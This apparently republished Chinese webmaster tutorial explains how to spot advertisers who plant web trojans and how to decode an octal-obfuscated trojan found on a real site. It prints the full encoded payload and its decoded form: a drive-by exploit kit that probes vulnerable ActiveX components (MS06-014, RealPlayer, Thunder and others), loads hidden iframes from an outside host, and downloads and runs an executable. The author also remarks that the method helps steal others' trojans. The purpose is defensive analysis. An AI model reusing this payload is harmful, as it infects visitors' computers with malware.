源代码网整理以下一般挂马者都喜欢找图片站,电影站,网址站等娱乐性站点...如果你技术又不太行,而又不想挂马,那要怎么样来识别挂马者呢?(当然,想挣这个钱的站长例外,可以不看!)
1,如何识别挂者?
1.1,突然一天,一个QQ加你说以高价的方式收流量(通常是100元/1万IP,按IP的质量来算.),其他大家想都能想到,有什么广告能值100元/1万呢? 99%是挂马的.
1.2,突然有一天,一个QQ加你说要买文字或图片广告,但是用要JS调用或者框架(iframe)引用代码,以方便统计. 这种情况只要你不要挂马,直接QQ拉黑,100%挂马者. 我一个朋友就上了一当,对方给50元/万IP按展示付费.最后我说你站被挂马,他还不知道怎么回事.后来气得哇哇叫...说要找一万只肉鸡D死那Y的..
1.3,如果你不相信第2点,挂上了对方的代码广告,杀毒软件并未报毒.那就请看打开网页时的反应.如果打开网页卡,甚至IE假死.100%有马! 如果你装了RealOne并没有打补丁,打开网页时弹一下RealOne播放器,100%有马!
/////////////////BY 俺老虎 (http://www.anyiba.com)////////////////////
2,如何查找和破解加密网马?
2.1,当然,我这个方法并不能破解所有加密网马.
2.2,我现在随便在网上找一个图片站吧...http://www.jamt.com.cn/(这是那位兄弟的,不好意思了,我是随便乱找的).打开这个站卡了我一分钟,并弹出RealOne.确定有马,那我就来解剖它,把马找出来吧.
2.2.1,查看源码,按Ctrl+F搜索"iframe",没有找到内容.那就能肯定站长不是用框架来挂的了,那继续查找"script" 这下找到这么一句<SCRIPT language=javascript src="admin/js/top.js"></SCRIPT>.网马可能就挂在http://www.jamt.com.cn/admin/js/top.js这里面,我们下载它.发现其内容如下:document.writeln("<iframe src=http://www.iceak.net/dl19.htm?001 width=1 height=1></iframe>"); 果不其然....
2.2.2,把框架的长和宽都设置成1不想让人看见啊?继续打开http://www.iceak.net/dl19.htm?001..查看源码,里面还是一个框架~<iframe src=news.html width=100 height=0></iframe>
2.2.3,继续打开http://www.iceak.net/news.html..这下内容出来了...我还以为你要藏10层呢...内容如下:
<script>window.onerror=function(){return true;}</script>
<script>
window.defaultStatus="完成";
eval("1511465014415714316515514515616456143157157153151145561511561441451701171465047117113475175755561511731512164162171173166141162401451451451451451451451457315121661411624014416314275421131411631601451621631531714273151216614116240141144157755014415714316515514515616456143162145141164145105154145155145156164504213417066146134170666213417066141134170666513417066631341706764425151731512166141162401221511631511561477542134170666313417066143134170666113417067631341706763134170667113417066644273151216614116240113126626060707542134170646113417066641341706614613417066641341706662134170621451341706563134170676413417067621341706665134170666113417066144427315121661411624011314116316014516216315317175421341706663134170661431341706763134170667113417066641341706314113417064621341706464134170637113417063661341706463134170636513417063651341706366134170621441341706366134170636513417064611341706363134170621441341706361134170636113417064641341706360134170621441341706371134170637013417063631341706461134170621441341706360134170636013417064631341706360134170636413417064661341706463134170636213417063711341706465134170636313417063664273151214114415756163145164101164164162151142165164145501221511631511561475411314116316014516216315317151731512166141162401411637514114415756143162145141164145157142152145143164501131266260607054424251175151214314116414315050145145145145145145145145511731757315121461511561411541541711731512166141162401451701601511621451637515614516740104141164145505173151214517016015116214516356163145164124151155145501451701601511621451635614714516412415115514550515363526660526660526160606051731512144157143165155145156164561431571571531511457547117113751311451637316014116415075577314517016015116214516375475314517016015116214516356164157107115124123164162151156147505173151215114650145145145145145145145145417542133157142152145143164401051621621571621354251173151214415714316515514515616456167162151164145504274163143162151160164401631621437515016416416072134571345716516314516263566114162142631436056156145164134571551636066606164561521637674134571631431621511601647642511751512145154163145173151216416217117316614116240146146146146146146146146731512166141162401571651621471411551457515614516740101143164151166145130117142152145143164504213417064671341706414313417064631341706470134170646113417065641341706214513417064671341706414313417064631341706670134170666113417067641341706463134170676413417067621341706614313417062145134170636142517317515121431411641431505014614614614614614614614651173175731512146151156141154154171173151146501461461461461461461461464175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016316417115414575144151163160154141171721561571561454016316214375421501641641607257571651631451626356611416214263143605615614516457107114127117122114104561501641551544276745715114616214115514576475117517515121641621711731661411624014714714714714714714714773151216614116240163164157162155751561451674010114316415116614513011714215214514316450421341706414413417065601341706563134170621451341706563134170676413417066146134170676213417066144134170656013417066143134170666113417067711341706665134170676242517317515121431411641431505014714714714714714714714751173175731512146151156141154154171173151146501471471471471471471471474175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016316417115414575144151163160154141171721561571561454016316214375421501641641607257571651631451626356611416214263143605615614516457123164157162155111111561501641551544276745715114616214115514576475117517515121641621711731661411624015015015015015015015015073151216614116240122145141154751561451674010114316415116614513011714215214514316450421341706471134170646513417065621341706560134170646313417067641341706614313417062145134170647113417064651341706562134170656013417064631341706764134170661431341706214513417063614251731751512143141164143150501501501501501501501501505117317573151214615115614115415417117315114650150150150150150150150150417542133157142152145143164401051621621571621354251173151214415714316515514515616456167162151164145504774163103162111160124401141011561071651011471057542152101166101163103162111160124424016316214375150164164160721345713457165163145162635661141621426314360561561451641345716214514115456152163767413457163143162151160164764751175175151216416217117316614116240151151151151151151151151731512166141162401641501651561441451627515614516740101143164151166145130117142152145143164504213417064641341706560134170646313417066143134170667113417066651341706614513417067641341706214513417065661341706614613417066644251731751512143141164143150501511511511511511511511515117317573151214615115614115415417117315114650151151151151151151151151417542133157142152145143164401051621621571621354251173151214415714316515514515616456167162151164145504774151146162141155145401631641711541457514415116316015414117172156157156145401631621437542150164164160725757165163145162635661141621426314360561561451645712415016515614414516256150164155154427674571511461621411551457647511751751512164162171173166141162401531531531531531531531537315121661411624010214115114416575156145167401011431641511661451301171421521451431645042134170646213417066611341706671134170666413417067651341706462134170666113417067621341706214513417065641341706614613417066146134170661434251731751512143141164143150501531531531531531531531535117317573151214615115614115415417117315114650153153153153153153153153417542133157142152145143164401051621621571621354251173151210214115114416513342134170646413417066143134170661461341706661134170666442534213417064641341706563421355042150164164160725757165163145162635661141621426314360561561451645710214115114416556143141142425440421341706462134170666113417066711341706664134170676513417062145134170666513417067701341706665425440605117517515121511465014614614614614614614614675754213315714215214514316440105162162157162135424046464014714714714714714714714775754213315714215214514316440105162162157162135424046464015015015015015015015015075754213315714215214514316440105162162157162135424046464015115115115115115115115175754213315714215214514316440105162162157162135425115121731512154157143141164151157156561621451601541411431455042141142157165164721421541411561534251731751512175175175")
</script>
2.2.4,能看懂的就不说了,不能看懂就是加过密成8进制的网页木马的内容了.那要怎么知道它到底在干些啥呢?下一步!
2.3,在得到以上加密内容后按下面操作,就可以得到它的加密内容了.
2.3.1,自己新建一个A.HTML,其内容如下:
<script>
document.write("<textarea cols=55 rows=10>"+ " 填上以上所有在eval里看不懂的8进制数 " +"</textarea>");
</script>
2.3.2,保存以上内容后,在浏览器里打开A.HTML,这个木马就是以下内容:
if(document.cookie.indexOf("OK")==-1){
try{var eeeeeeee;
var dsb="Kaspersky";
var ado=(document.createElement("x6fx62x6ax65x63x74"));
var Rising="x63x6cx61x73x73x69x64";
var KV2008="x41x64x6fx64x62x2ex53x74x72x65x61x6d";
var Kaspersky="x63x6cx73x69x64x3ax42x44x39x36x43x35x35x36x2dx36x35x41x33x2dx31x31x44x30x2dx39x38x33x41x2dx30x30x43x30x34x46x43x32x39x45x33x36";
ado.setAttribute(Rising,Kaspersky);
var as=ado.createobject(KV2008,"")}
catch(eeeeeeee){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+3*60*60*1000);
document.cookie="OK=Yes;path=/;expires="+expires.toGMTString();
if(eeeeeeee!="[object Error]"){
document.write("<script src=http://user3.1a2b3c0.net/ms06014.js></script>")}
else{
try{var ffffffff;
var ourgame=new ActiveXObject("x47x4cx43x48x41x54x2ex47x4cx43x68x61x74x43x74x72x6cx2ex31");}
catch(ffffffff){};
finally{if(ffffffff!="[object Error]"){
document.write("<iframe style=display:none src="http://user3.1a2b3c0.net/GLWORLD.html"></iframe>")}}
try{var gggggggg;
var storm=new ActiveXObject("x4dx50x53x2ex53x74x6fx72x6dx50x6cx61x79x65x72");}
catch(gggggggg){};
finally{if(gggggggg!="[object Error]"){
document.write("<iframe style=display:none src="http://user3.1a2b3c0.net/StormII.html"></iframe>")}}
try{var hhhhhhhh;
var Real=new ActiveXObject("x49x45x52x50x43x74x6cx2ex49x45x52x50x43x74x6cx2ex31");}
catch(hhhhhhhh){};
finally{if(hhhhhhhh!="[object Error]"){
document.write("<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http://user3.1a2b3c0.net/real.js></script>")}}
try{var iiiiiiii;
var thunder=new ActiveXObject("x44x50x43x6cx69x65x6ex74x2ex56x6fx64");}
catch(iiiiiiii){};
finally{if(iiiiiiii!="[object Error]"){
document.write("<iframe style=display:none src="http://user3.1a2b3c0.net/Thunder.html"></iframe>")}}
try{var kkkkkkkk;
var Baidu=new ActiveXObject("x42x61x69x64x75x42x61x72x2ex54x6fx6fx6c");}
catch(kkkkkkkk){};
finally{if(kkkkkkkk!="[object Error]"){
Baidu["x44x6cx6fx61x64"+"x44x53"]("http://user3.1a2b3c0.net/Baidu.cab", "x42x61x69x64x75x2ex65x78x65", 0)}}
if(ffffffff=="[object Error]" && gggggggg=="[object Error]" && hhhhhhhh=="[object Error]" && iiiiiiii=="[object Error]")
{
location.replace("about:blank");}
}}}
2.3.3,里面还有一些比如"x47x4cx43x48x41x54x2ex47"的16六进制数,也可以按上面的步骤得到真实的数据. 看看这个马,我也不再打算再深挖下去了,可以看出这是个组合网马,包含MS06014网马,RealOne网马,迅雷网马等...总之就是要利用一切可能的漏洞让你下载木马或插件.
2.3.4,这方法还可以帮你去偷别个的VIP网马,不过本方法只适合于数制转换加密,有的网马用的自己的加秘函数,不过也是有办法破解的...因为无论再怎么加密只是让人看不懂,机器总会看得懂的...所以要破解这样的加密方式也很简单,把对应的一个Return改成document.write也一样能看到本来面目...
最后,此文一发,势必会引起很多人的反感...我是否有罪呢?也许吧!断了别人的财路,确也不该. 但是如果站长不再挂毒了,网民看网页不再怕了,上网就是等于QQ的时代也就过去了,更多的人上网是来看翻网页的,那我们站长的钱路不就更宽了吗? 想想也算是为了中国互联网天空更加纯净出了微乎其微的一份力吧...
源代码网供稿. 
